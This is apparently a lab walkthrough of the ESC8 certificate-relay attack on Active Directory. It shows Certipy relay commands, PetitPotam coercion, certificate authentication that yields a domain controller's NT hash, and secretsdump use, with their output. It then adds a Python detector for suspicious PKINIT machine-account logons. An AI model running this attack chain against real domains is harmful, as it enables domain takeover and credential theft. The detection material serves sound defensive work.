ESC8 - with certipy
Certipy is an ADCS attack tool that automates a lot of these steps. Let's do the same attack with Certipy.

Install Certipy:

```bash
sudo pip3 install certipy-ad
```

Set up the relay listener, pointing it at the CA and asking for the DomainController template:

```bash
sudo certipy relay -ca 192.168.56.23 -template DomainController
```
Execute the coercion just like we did before with PetitPotam:

```bash
python3 PetitPotam.py 192.168.56.31 baltimore.maryland.local
```
Now that we have the certificate, we can get both a TGT and the NT hash of the DC machine account with the command:

```bash
sudo certipy auth -pfx baltimore.pfx -dc-ip 192.168.56.12
```

```
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: baltimore$@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'baltimore.ccache'
[*] Trying to retrieve NT hash for 'baltimore$'
[*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759
```

Either the credential cache or the hash can then be used with secretsdump:
```bash
export KRB5CCNAME=/home/jefe/ADCS/baltimore.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local

# or with the hash
secretsdump.py -hashes ':aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759' -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local
```
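From the defender's side, the step that stands out in this chain is the `certipy auth` call: a machine account (`baltimore$`) obtains a TGT with certificate-based (PKINIT) pre-authentication from a host that is not the machine itself. Windows Security event 4768 records the pre-authentication type (16 = PA-PK-AS-REQ, i.e. PKINIT) and the client address, so this can be flagged. The following detector is an added example, not code from the page or from Certipy; the key=value log layout, the sample records and the inventory of expected machine IPs are constructed for the example (192.168.56.31 is the page's address for baltimore, 192.168.56.50 is an invented client address).

```python
# Added example (not part of the original page): flag machine-account TGT
# requests that used PKINIT pre-auth from an unexpected client address.
# Event 4768 field semantics are real; the key=value record layout, the
# sample records and the host inventory below are constructed for this demo.
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

PA_ENC_TIMESTAMP = 2   # password-based pre-auth (normal for machine accounts)
PA_PK_AS_REQ = 16      # certificate-based pre-auth (PKINIT), used by certipy auth


@dataclass
class TgtRequest:
    account: str       # TargetUserName from event 4768
    client_ip: str     # IpAddress from event 4768, v4-mapped prefix removed
    preauth_type: int  # PreAuthType from event 4768


def parse_4768(line: str) -> TgtRequest:
    """Parse one constructed 'key=value;key=value' 4768 record."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split(";"))
    # Windows logs IPv4 clients as ::ffff:a.b.c.d; normalise for comparison.
    ip = fields["IpAddress"]
    if ip.startswith("::ffff:"):
        ip = ip[len("::ffff:"):]
    return TgtRequest(fields["TargetUserName"], ip, int(fields["PreAuthType"]))


def find_suspicious_pkinit(lines: Iterable[str],
                           expected_hosts: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (account, client_ip) for machine accounts ($) that authenticated
    with PKINIT from an address other than the one in the inventory.
    expected_hosts maps machine account -> its own IP (assumed inventory)."""
    hits = []
    for line in lines:
        ev = parse_4768(line)
        if ev.preauth_type != PA_PK_AS_REQ:
            continue                      # only certificate-based logons
        if not ev.account.endswith("$"):
            continue                      # users with smart cards are expected to PKINIT
        if expected_hosts.get(ev.account) == ev.client_ip:
            continue                      # the machine itself, e.g. after cert renewal
        hits.append((ev.account, ev.client_ip))
    return hits


# Constructed sample records: a normal machine logon, the relayed-certificate
# logon from an invented attacker address, and a smart-card user logon.
SAMPLE_4768 = [
    "EventID=4768;TargetUserName=baltimore$;IpAddress=::ffff:192.168.56.31;PreAuthType=2",
    "EventID=4768;TargetUserName=baltimore$;IpAddress=::ffff:192.168.56.50;PreAuthType=16",
    "EventID=4768;TargetUserName=jdoe;IpAddress=::ffff:192.168.56.60;PreAuthType=16",
]

# Assumed inventory: which address each machine account normally logs on from.
EXPECTED_HOSTS = {"baltimore$": "192.168.56.31"}


if __name__ == "__main__":
    for account, ip in find_suspicious_pkinit(SAMPLE_4768, EXPECTED_HOSTS):
        print(f"ALERT: machine account {account} used PKINIT from {ip}")
```

The allow-list on the machine's own address keeps legitimate certificate renewals and auto-enrollment quiet; the interesting signal is PKINIT for a `$` account coming from anywhere else, which is exactly what the relayed DomainController certificate produces. On the CA side, the same chain leaves a DomainController-template issuance in the CA database that should be reconciled against the set of real domain controllers.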